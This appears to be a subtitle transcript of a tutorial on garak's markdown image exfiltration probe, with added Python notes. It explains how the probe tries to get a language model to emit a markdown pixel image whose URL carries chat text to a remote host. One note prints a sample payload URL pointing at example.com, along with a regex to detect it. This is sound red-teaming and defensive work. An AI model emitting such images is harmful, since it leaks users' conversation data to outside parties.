WEBVTT

00:00.680 --> 00:02.240
Hello everyone and welcome.

00:02.640 --> 00:06.600
In this video, we will go over the markdown image exfiltration probe.

00:06.920 --> 00:12.200
For that, I'll walk you through the probe's entry in the garak reference documentation.

00:12.520 --> 00:15.680
On the left-hand menu, I'll go to garak.probes.

00:15.840 --> 00:19.360
And here is where you'll find the details about all the probes.

00:19.480 --> 00:21.800
I'll click on garak.probes.xss.

00:22.000 --> 00:25.520
And in there we have markdown image exfiltration.

00:26.400 --> 00:27.680
Here's what it says.

00:27.880 --> 00:33.120
Can we get the model to write embedded assets exfiltrating text in the URI?

00:33.760 --> 00:38.520
Attempts will be made to get the model to plant a markdown pixel image in output.
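
NOTE
To make the idea concrete, here is a minimal Python sketch of what a "planted" markdown image looks like and how one might spot it.
The regex, the function name find_exfil_images, and the example.com URL are illustrative assumptions, not garak's own detector logic.
```python
import re
# Hypothetical, simplified pattern: a markdown image whose URL carries a query string.
# This is NOT garak's detector regex, only an illustration of the idea.
MD_IMAGE_WITH_QUERY = re.compile(r"!\[[^\]]*\]\((https?://[^\s)]+\?[^\s)]+)\)")
def find_exfil_images(text: str) -> list[str]:
    """Return URLs of markdown images that include query parameters."""
    return MD_IMAGE_WITH_QUERY.findall(text)
# Hypothetical model output; example.com stands in for an attacker-controlled host.
sample = "Sure! ![pixel](https://example.com/logo.png?q=secret+chat+summary)"
print(find_exfil_images(sample))
```
If a chat client renders that image, the query string travels to the remote host, which is why the probe checks for it.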

00:38.920 --> 00:46.840
Now let's go ahead and do a hands-on activity using this probe on the GPT-3.5 Turbo model and the GPT-2 model

00:46.880 --> 00:48.040
on Hugging Face.

00:48.600 --> 00:51.120
So here's the PyCharm project.

00:51.320 --> 00:54.480
I am at the root directory for the garak project.

00:54.680 --> 00:57.640
In the run configuration, generations is set to one.

00:58.040 --> 01:02.640
Basically, this means that we want the prompts to be sent to the model only once.

01:03.080 --> 01:06.160
The plugins field here has the probe that we want to specify.

01:07.000 --> 01:11.800
In this scenario, we have xss.MarkdownImageExfil.

01:12.000 --> 01:15.200
The model type here is OpenAI, which is the platform.

01:15.200 --> 01:19.520
And then the model name is gpt-3.5-turbo.

01:19.760 --> 01:26.080
And the report directory is the reports directory within the root

01:26.080 --> 01:26.920
directory.
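
NOTE
The settings just described can be sketched as a nested structure. This Python snippet prints it as simple YAML.
The key names (run, plugins, probe_spec, model_type, model_name, reporting, report_dir) are my assumption about the config layout and may differ between garak versions; to_yaml is a hypothetical helper.
```python
# Assumed garak config layout; key names may differ across garak versions.
config = {
    "run": {"generations": 1},
    "plugins": {
        "probe_spec": "xss.MarkdownImageExfil",
        "model_type": "openai",
        "model_name": "gpt-3.5-turbo",
    },
    "reporting": {"report_dir": "reports"},
}
def to_yaml(node: dict, indent: int = 0) -> str:
    """Render a nested dict of scalars as simple block-style YAML."""
    lines = []
    for key, value in node.items():
        pad = " " * indent
        if isinstance(value, dict):
            lines.append(f"{pad}{key}:")
            lines.append(to_yaml(value, indent + 2))
        else:
            lines.append(f"{pad}{key}: {value}")
    return "\n".join(lines)
print(to_yaml(config))
```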

01:27.160 --> 01:28.960
Now let's go ahead and run this.

01:29.880 --> 01:35.320
For that, I'll enter the command garak --config with the probe exfiltration YAML file and go ahead and execute this.

01:35.680 --> 01:42.120
But before I execute this, I want to emphasize that you can run what's in the YAML file with a plain

01:42.120 --> 01:43.200
CLI command.
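
NOTE
As a rough illustration of the CLI route, this Python sketch assembles an equivalent command line from the same settings.
The flag names are the ones I believe garak accepts (--model_type, --model_name, --probes, --generations); check garak --help for your version. garak_argv is a hypothetical helper.
```python
import shlex
def garak_argv(model_type: str, model_name: str, probes: str, generations: int) -> list[str]:
    """Build an argument list for a garak run (flag names assumed, see the note above)."""
    return [
        "garak",
        "--model_type", model_type,
        "--model_name", model_name,
        "--probes", probes,
        "--generations", str(generations),
    ]
# Print the command as a single shell-safe string.
print(shlex.join(garak_argv("openai", "gpt-3.5-turbo", "xss.MarkdownImageExfil", 1)))
```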

01:43.560 --> 01:49.840
It's just easier for me to use a YAML file because it's more descriptive and I don't have to do repetitive

01:49.840 --> 01:51.280
things again and again.

01:52.240 --> 01:57.880
That's why I'm using a yml file, but you can use whatever works best for you.

01:58.200 --> 02:00.720
So for now I'll go ahead and execute this.

02:01.040 --> 02:04.880
If you notice, it's reporting to our reports directory.

02:05.080 --> 02:09.880
The entry and the markdown probe that we wanted to run are shown here.

02:09.880 --> 02:16.830
And it passed both tests, that is, the basic markdown exfiltration check and the markdown exfiltration content check.

02:17.070 --> 02:17.950
That's great.

02:18.230 --> 02:21.070
Now let's go ahead and analyze the result for this execution.

02:21.830 --> 02:24.430
So here is the report in JSON Lines format.

02:24.710 --> 02:26.870
All the details are here.

02:27.110 --> 02:30.270
It's hard to read and understand each line item,

02:30.270 --> 02:32.590
since this is a lot of detail.

02:32.870 --> 02:33.790
Let's do this.

02:33.950 --> 02:37.350
Let's pick one result and go ahead and put it in another file,

02:37.390 --> 02:37.990
a JSON file.

02:38.310 --> 02:40.550
I'm going to do a soft wrap here.

02:40.790 --> 02:42.550
So here is the entire result.

02:42.550 --> 02:44.270
That's a bit easier to read.

02:44.430 --> 02:48.390
So let's go over the fields that are part of these results.

02:48.670 --> 02:51.710
Here's the prompt that was sent to the foundation model.

02:52.110 --> 02:53.390
Here's the output.

02:54.310 --> 02:59.830
Then we have this detector results field, which holds each detector's evaluation of the output.

03:00.230 --> 03:05.830
And those are pretty much the main parts of the results that you want

03:05.830 --> 03:06.430
to know.
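
NOTE
Here is a small Python sketch of pulling those fields out of one report line.
The sample line is hypothetical and trimmed. Real entries carry more fields, and the field names (entry_type, prompt, outputs, detector_results) and detector names are assumptions based on what the report shows.
```python
import json
# Hypothetical, trimmed report line; real entries carry more fields and real model text.
line = json.dumps({
    "entry_type": "attempt",
    "prompt": "<prompt sent to the model>",
    "outputs": ["<model response>"],
    "detector_results": {
        "xss.MarkdownExfilBasic": [0.0],
        "xss.MarkdownExfilContent": [0.0],
    },
})
def summarize(raw: str) -> dict:
    """Keep only the prompt, the outputs, and the names of the detectors that scored them."""
    entry = json.loads(raw)
    return {
        "prompt": entry["prompt"],
        "outputs": entry["outputs"],
        "detectors": sorted(entry["detector_results"]),
    }
print(summarize(line))
```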

03:06.710 --> 03:10.470
So now let's go ahead and run the same probe with a different model.

03:10.750 --> 03:17.230
So in this scenario, what I'm going to do is use Hugging Face.

03:17.670 --> 03:21.470
I'll set GPT-2 as the model that we want to run against.

03:22.310 --> 03:29.700
I'll clear everything and run garak --config with the probe exfiltration file. Since GPT-2 is hosted on

03:29.740 --> 03:35.380
Hugging Face, which is pretty much a free, resource-driven platform, it takes a while for it to execute

03:35.380 --> 03:40.700
the entire set of exfiltration prompts that we throw at the model.

03:40.740 --> 03:46.500
I'm going to pause the video for a little bit, and once it's done, I will resume it and we can go

03:46.500 --> 03:47.580
over the results.

03:47.780 --> 03:48.460
Thank you.

03:48.740 --> 03:49.700
And I'll be back.

03:50.020 --> 03:55.340
So after 1,125 seconds, the job was completed.

03:55.700 --> 03:59.060
And if you notice, it passed 12 out of 12 tests.

03:59.060 --> 04:03.940
It created a JSON Lines file in the reports directory.

04:04.140 --> 04:05.660
Let me open that.

04:05.660 --> 04:07.540
And here it ran the tests.

04:07.540 --> 04:12.060
I'm going to pick one random test here and put that in the results file.

04:12.500 --> 04:18.700
And if you notice, it's a very similar format: there's a prompt.

04:18.700 --> 04:20.740
And then there is output here.

04:20.940 --> 04:23.700
And then there is the detector results field, along with the notes.

04:23.900 --> 04:27.260
And that's the overall format that the tool uses.
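
NOTE
Since every line follows that format, a whole report can be scanned the same way. This Python sketch counts evaluated attempts and how many had a detector hit.
The in-memory sample, the count_hits helper, and the 0.5 threshold are assumptions for illustration; a real run would iterate over the report file in the reports directory.
```python
import io
import json
def count_hits(lines, threshold: float = 0.5) -> tuple[int, int]:
    """Return (attempts evaluated, attempts with any detector score at or above threshold)."""
    total = hits = 0
    for raw in lines:
        if not raw.strip():
            continue
        entry = json.loads(raw)
        # Skip non-attempt entries and attempts that have no detector scores yet.
        if entry.get("entry_type") != "attempt" or not entry.get("detector_results"):
            continue
        total += 1
        scores = [s for vals in entry["detector_results"].values() for s in vals]
        if any(s >= threshold for s in scores):
            hits += 1
    return total, hits
# Hypothetical three-line report standing in for a real JSON Lines file.
report = io.StringIO("\n".join([
    json.dumps({"entry_type": "config"}),
    json.dumps({"entry_type": "attempt", "detector_results": {"d1": [0.0], "d2": [0.0]}}),
    json.dumps({"entry_type": "attempt", "detector_results": {"d1": [1.0], "d2": [0.0]}}),
]))
print(count_hits(report))
```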

04:27.620 --> 04:30.740
Thank you so much. I will see you in the next video.